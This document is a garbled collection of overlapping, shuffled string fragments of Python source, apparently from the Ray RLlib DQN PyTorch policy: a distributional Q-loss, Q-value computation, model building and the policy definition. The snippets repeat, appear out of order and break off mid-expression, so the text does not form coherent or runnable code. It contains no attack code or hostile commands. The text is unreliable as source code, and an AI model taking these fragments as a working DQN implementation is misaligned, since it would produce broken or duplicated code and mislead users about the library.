(r_tau - v_min) / ((v_max - v_min) /", "model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [], None) if config[\"num_atoms\"]", "= obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do", "== \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\",", "\"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class", "obs: TensorType, explore, is_training: bool = False): config = policy.config", "\"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0 - done_mask) *", "obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t", "support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores -", "{ # TODO: better Q stats for dist dqn \"mean_td_error\":", "num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best *", "Dict, List, Tuple import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import", "in most implementations # when b happens to be an", "= torch.mean(self.td_error * importance_weights) self.stats = { # TODO: better", "self.loss = torch.mean(self.td_error * importance_weights) self.stats = { # TODO:", "1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS],", "policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class,", "ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\":", "torch.unsqueeze( rewards, -1) + gamma**n_step * torch.unsqueeze( 1.0 - done_mask,", "1) # (batch_size, 1) * (1, num_atoms) = (batch_size, num_atoms)", "# try to infer the last layer size, otherwise fall", "# priority is robust and insensitive to `prioritized_replay_alpha` self.td_error =", "support_logits_per_action) value = torch.sum(z * support_prob_per_action, dim=-1) logits = support_logits_per_action", "import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import try_import_torch", "build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from", "Distributional Q-learning which corresponds to an entropy loss z =", "* torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate of best possible", "Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space", "is not supported for DQN.\".format(action_space)) if config[\"hiddens\"]: # try to", "optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[", "l_project = F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms) u_project =", "Policy, model, _, train_batch: SampleBatch) -> TensorType: config = policy.config", "*, explore: bool = True, is_training: bool = False, **kwargs)", "q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False,", "q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True)", "obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy,", "policy has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2,", "F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0,", "= policy.config # Q-network evaluation. q_t, q_logits_t, q_probs_t = compute_q_values(", "q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) #", "Policy, batch) -> Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr, },", "action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy:", "z = torch.range(0.0, num_atoms - 1, dtype=torch.float32) z = v_min", "= state_score + advantages_centered else: value = action_scores return value,", "LayerNorm after each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars", "dim=-1) logits = support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean =", "input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights #", "v_min, v_max) b = (r_tau - v_min) / ((v_max -", "because (ub-b) == (b-lb) == 0. floor_equal_ceil = (ub -", "(batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms,", "better Q stats for dist dqn \"mean_td_error\": torch.mean(self.td_error), } else:", "/ float(num_atoms - 1) # (batch_size, 1) * (1, num_atoms)", "- done_mask, -1) * torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min,", "softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error * importance_weights) self.stats =", "num_atoms) ml_delta = q_probs_tp1_best * (ub - b + floor_equal_ceil)", "-> Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch, explore,", "for actions which we know were selected in the given", "setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"],", "= None if nn: F = nn.functional class QLoss: def", "adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr,", "-> Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def", "import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import (", "num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms)", "from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy", "-1), dim=1) mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1)", "into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or", "torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) -> Dict[str,", "gamma**n_step * q_tp1_best_masked # compute the error (potentially clipped) self.td_error", "q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1", "ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn = try_import_torch() F =", "(1.0 - done_mask) * q_tp1_best # compute RHS of bellman", "ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space,", "ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy", "from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf,", "torch, nn = try_import_torch() F = None if nn: F", "- v_min) / float(num_atoms - 1)) lb = torch.floor(b) ub", "entropy loss for # priority is robust and insensitive to", "q_vals[0] if isinstance(q_vals, tuple) else q_vals policy.q_values = q_vals return", "is_training=True) # Target Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values(", "is_training, }, [], None) if config[\"num_atoms\"] > 1: (action_scores, z,", "+ z * (v_max - v_min) / float(num_atoms - 1)", "torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1 *", "config = policy.config # Q-network evaluation. q_t, q_logits_t, q_probs_t =", "v_min) / float(num_atoms - 1) # (batch_size, 1) * (1,", "1, dtype=torch.float32) z = v_min + z * (v_max -", "# (batch_size, 1) * (1, num_atoms) = (batch_size, num_atoms) r_tau", "value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType)", "q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return", "policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[ TargetNetworkMixin, ComputeTDErrorMixin, LearningRateSchedule,", "torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection = F.one_hot(", "rewards, -1) + gamma**n_step * torch.unsqueeze( 1.0 - done_mask, -1)", "q_tp1_best_masked # compute the error (potentially clipped) self.td_error = q_t_selected", "DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from", "other models the policy has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy:", "torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t, rew_t,", "model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"],", "= torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection =", "ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"],", "of best possible value starting from state at t +", "ml_delta + mu_delta # Rainbow paper claims that using this", "torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss( q_t_selected,", "QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask,", "* huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\":", "q_probs_tp1_best * (b - lb) ml_delta = torch.sum( l_project *", "policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch: TensorType,", "def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict)", "torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t *", "action_scores return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\",", "model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], #", "dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option", "List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch, explore, is_training) q_vals =", "torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min, v_max) b = (r_tau", "= torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection,", "done_mask) * q_tp1_best # compute RHS of bellman equation q_t_selected_target", "ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper)", "-1) + gamma**n_step * torch.unsqueeze( 1.0 - done_mask, -1) *", "v_min + z * (v_max - v_min) / float(num_atoms -", "ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch", "(1, num_atoms) = (batch_size, num_atoms) r_tau = torch.unsqueeze( rewards, -1)", "= reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores - torch.unsqueeze( advantages_mean, 1)", "* torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min, v_max) b =", "1) advantages_centered = action_scores - torch.unsqueeze( advantages_mean, 1) value =", "= model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] >", "* q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1),", "torch.floor(b) ub = torch.ceil(b) # Indispensable judgement which is missed", "config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs = action_space.n # TODO(sven):", "num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option to", "know were selected in the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS],", "ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import", "= { # TODO: better Q stats for dist dqn", "gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import", "back to 256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] =", "state at t + 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\", "dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space,", "eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]: return dict({", "into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space,", "else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum(", "lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]: return", "obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"],", "-1) * torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min, v_max) b", "space {} is not supported for DQN.\".format(action_space)) if config[\"hiddens\"]: #", "(b - lb) ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta, -1),", "selected in the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected", "state = model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [], None)", "ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType,", "to an entropy loss z = torch.range(0.0, num_atoms - 1,", "self.stats = { # TODO: better Q stats for dist", "* importance_weights) self.stats = { # TODO: better Q stats", "-> Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\",", "= (1.0 - done_mask) * q_tp1_best # compute RHS of", "rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms >", "ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS,", "<reponame>ThomasLecat/ray from typing import Dict, List, Tuple import gym import", "import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import", "is missed in most implementations # when b happens to", "- lb < 0.5).float() # (batch_size, num_atoms, num_atoms) l_project =", "from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from", "from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops", "config[\"model\"][\"no_final_linear\"] = True else: num_outputs = action_space.n # TODO(sven): Move", "FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected = torch.sum(", "= torch.sum(z * support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits =", "\"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2(", "num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms > 1: # Distributional Q-learning", "loss for # priority is robust and insensitive to `prioritized_replay_alpha`", "from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework", "* torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1),", "dim=1) mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1) m", "bellman equation q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked #", "\"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def", "bool = True, is_training: bool = False, **kwargs) -> Tuple[TensorType,", "from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise", "-> TensorType: config = policy.config # Q-network evaluation. q_t, q_logits_t,", "-> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move target", "* support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits = support_prob_per_action else:", "extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[ TargetNetworkMixin, ComputeTDErrorMixin,", "-1), 1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best", "last layer size, otherwise fall back to 256 num_outputs =", "q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals policy.q_values =", "def __init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict", "= ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"],", "when b happens to be an integer, lb == ub,", "an integer, lb == ub, so pr_j(s', a*) will #", "v_min=-10.0, v_max=10.0): if num_atoms > 1: # Distributional Q-learning which", "- v_min) / ((v_max - v_min) / float(num_atoms - 1))", "self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\":", "\"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t,", "explore, is_training) q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals", "* (ub - b + floor_equal_ceil) mu_delta = q_probs_tp1_best *", "SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [], None) if config[\"num_atoms\"] >", "importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] =", "torch.sum(z * support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits = support_prob_per_action", "TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from", "u_project * torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta + mu_delta", "return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch:", "models the policy has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy,", "= policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2, obs: TensorType, explore,", "if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered", "torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t,", "if config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean", "1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0,", "ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"],", "after each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars =", "loss: TensorType) -> Dict[str, TensorType]: # Clip grads if configured.", "train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss", "DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats,", "= torch.floor(b) ub = torch.ceil(b) # Indispensable judgement which is", "0.5).float() # (batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms) #", "TensorType, *, explore: bool = True, is_training: bool = False,", "F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0,", "- torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1) +", "def adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars,", "r_tau = torch.unsqueeze( rewards, -1) + gamma**n_step * torch.unsqueeze( 1.0", "generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical", "v_min) / ((v_max - v_min) / float(num_atoms - 1)) lb", "discarded because (ub-b) == (b-lb) == 0. floor_equal_ceil = (ub", "dist dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0 -", "import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio)", "state_score + advantages_centered else: value = action_scores return value, logits,", "q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if", "{} is not supported for DQN.\".format(action_space)) if config[\"hiddens\"]: # try", "if num_atoms > 1: # Distributional Q-learning which corresponds to", "float(num_atoms - 1) # (batch_size, 1) * (1, num_atoms) =", "- 1, dtype=torch.float32) z = v_min + z * (v_max", "model, obs_batch, explore, is_training) q_vals = q_vals[0] if isinstance(q_vals, tuple)", "action_dist) -> Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy(", "r_tau = torch.clamp(r_tau, v_min, v_max) b = (r_tau - v_min)", "TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch: TensorType, *,", "support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1))", "Target Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model,", "# Clip grads if configured. return apply_grad_clipping(policy, optimizer, loss) def", "TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {}", "integer, lb == ub, so pr_j(s', a*) will # be", "mu_delta # Rainbow paper claims that using this cross entropy", "Indispensable judgement which is missed in most implementations # when", "= torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection,", "= action_scores return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer:", "= { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error),", "= True, is_training: bool = False, **kwargs) -> Tuple[TensorType, type,", "support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value = torch.sum(z * support_prob_per_action,", "= q_t_selected - q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error))", "act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask", "def get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch: TensorType, *, explore:", "# (batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta =", "postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init,", "floor_equal_ceil = (ub - lb < 0.5).float() # (batch_size, num_atoms,", "train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def", "advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores - torch.unsqueeze( advantages_mean,", "is done autoatically for the # policy.model, but not for", "PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy", "the policy has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model:", "self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats = { \"mean_q\":", "# Rainbow paper claims that using this cross entropy loss", "-> Dict[str, TensorType]: # Clip grads if configured. return apply_grad_clipping(policy,", "torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1)", "is robust and insensitive to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected,", "= ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"],", "-1), 1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS],", "* torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta + mu_delta #", "labels=m) self.loss = torch.mean(self.td_error * importance_weights) self.stats = { #", "torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1)", "has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2, obs:", "import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy", "try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing", "Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS],", "q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, 